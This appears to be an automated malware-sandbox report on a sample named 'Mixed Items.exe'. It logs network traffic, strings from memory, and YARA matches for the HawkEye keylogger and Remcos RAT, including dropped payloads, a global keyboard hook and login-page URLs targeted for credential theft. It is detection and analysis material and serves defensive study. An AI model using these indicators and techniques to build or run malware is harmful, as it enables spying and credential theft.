                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C7589177DBC0A00C03B00FCEDE09850.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-EBDA9D3C78F7FA5DA1492447CFEEA8B3.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-EBDA9D3C78F7FA5DA1492447CFEEA8B3.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ACE03D270F49949C304CBC49EDC5CEFA.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ACE03D270F49949C304CBC49EDC5CEFA.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5120AB9D8EED6517DE7E81CD470A03B1.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC805D8F9D665A8AE96BD3B687F20834.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CADB725393BA475AD7E7466656748C83.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5120AB9D8EED6517DE7E81CD470A03B1.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC805D8F9D665A8AE96BD3B687F20834.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CADB725393BA475AD7E7466656748C83.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1031025574F544F1BD64E20EEEC4AAC7.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C391B584FB3EF0C3E1226CABE1FDCB1.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C7589177DBC0A00C03B00FCEDE09850.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1031025574F544F1BD64E20EEEC4AAC7.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: hawkgoods.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: unknownDNS traffic detected: queries for: liverpoolofcfanclub.com
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: powershell.exe, 0000000A.00000002.509053847.0000000000924000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: svchost.exe, 00000006.00000002.524308365.000001FC10813000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: svchost.exe, 00000020.00000002.535147129.0000000000C9B000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: Mixed Items.exe, 00000000.00000003.209301179.0000000000BD3000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?814e6289d9d96
                        Source: Mixed Items.exeString found in binary or memory: http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--
                        Source: Mixed Items.exeString found in binary or memory: http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrardset_CurrentDirectory-liverpo
                        Source: powershell.exe, 0000000A.00000002.550176281.0000000005536000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.549247252.0000000005C06000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: svchost.exe, 00000006.00000002.524308365.000001FC10813000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                        Source: svchost.exe, 00000006.00000002.524308365.000001FC10813000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                        Source: powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 0000000A.00000002.533087278.0000000004617000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: svchost.exe, 00000006.00000002.527814462.000001FC10A00000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: powershell.exe, 0000000A.00000002.524606863.00000000044D1000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.517492550.0000000004BA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000A.00000002.533087278.0000000004617000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: hawkgoods.exeString found in binary or memory: http://whatismyipaddress.com/
                        Source: powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: AdvancedRun.exe, AdvancedRun.exe, 00000009.00000000.266715806.000000000040C000.00000002.00020000.sdmp, hawkgoods.exeString found in binary or memory: http://www.nirsoft.net/
                        Source: powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: hawkgoods.exeString found in binary or memory: https://login.yahoo.com/config/login
                        Source: powershell.exe, 0000000A.00000002.550176281.0000000005536000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.549247252.0000000005C06000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: Mixed Items.exe, 00000000.00000003.209749994.0000000000BBF000.00000004.00000001.sdmpString found in binary or memory: https://wadl.windowsupdate.com/
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: hawkgoods.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        barindex
                        Yara detected HawkEye KeyloggerShow sources
                        Source: Yara matchFile source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.445844944.0000000002FEC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Installs a global keyboard hookShow sources
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWindow created: window name: CLIPBRDWNDCLASS

                        E-Banking Fraud:

                        barindex
                        Yara detected Remcos RATShow sources
                        Source: Yara matchFile source: 00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.490909756.0000000000A7A000.00000004.00000020.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVFJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037BB38
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037DE68
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037F6D0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B4180
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BE483
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BE483
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BE483
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BBBF6
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BE483
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BE483
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BE483
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BE483
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B4180
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003BBBF6
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00E3E5E0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00E2A0A0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00E2F870
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00E2E008
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00E24CC0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00E2BCD8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00D3C279
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00D3C30B
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_004CD426
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_004CD523
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_004DD5AE
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_004D7646
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_005029BE
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00506AF4
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_0052ABFC
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00523C4D
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00523CBE
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_004CED03
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00523D2F
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00523DC0
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_004CCF92
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_004DAFA6
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D05758
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D06048
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D08710
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D07098
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D01D98
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D08A74
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_004FC7BC
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: String function: 0050BA9D appears 35 times
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                        Source: Mixed Items.exeStatic PE information: invalid certificate
                        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: Mixed Items.exe, 00000000.00000000.205841932.00000000003E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMotherFuckerBitch.exe6 vs Mixed Items.exe
                        Source: Mixed Items.exeBinary or memory string: OriginalFilename vs Mixed Items.exe
                        Source: Mixed Items.exeBinary or memory string: OriginalFilename vs Mixed Items.exe
                        Source: Mixed Items.exe, 00000018.00000000.295563361.0000000000042000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMotherFuckerBitch.exe6 vs Mixed Items.exe
                        Source: Mixed Items.exeBinary or memory string: OriginalFilename vs Mixed Items.exe
                        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                        Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 0000001E.00000002.473493158.0000000007AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
